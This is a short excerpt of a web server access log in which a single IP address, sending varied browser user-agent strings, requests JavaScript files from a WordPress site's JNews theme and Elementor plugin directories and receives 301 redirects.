44.242.175.0 - - [03/Feb/2024:14:02:08 +0100] "GET //cronicareinodearagon.com/wp-content/themes/jnews/assets/dist/frontend.min.js HTTP/1.1" 301 - cronicareinodearagon.com "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36 Edg/101.0.1210.32" "-"
44.242.175.0 - - [03/Feb/2024:14:02:08 +0100] "GET //cronicareinodearagon.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js HTTP/1.1" 301 - cronicareinodearagon.com "-" "Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1" "-"
44.242.175.0 - - [03/Feb/2024:14:02:08 +0100] "GET //cronicareinodearagon.com/wp-content/plugins/elementor/assets/js/frontend.min.js HTTP/1.1" 301 - cronicareinodearagon.com "-" "Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1" "-"
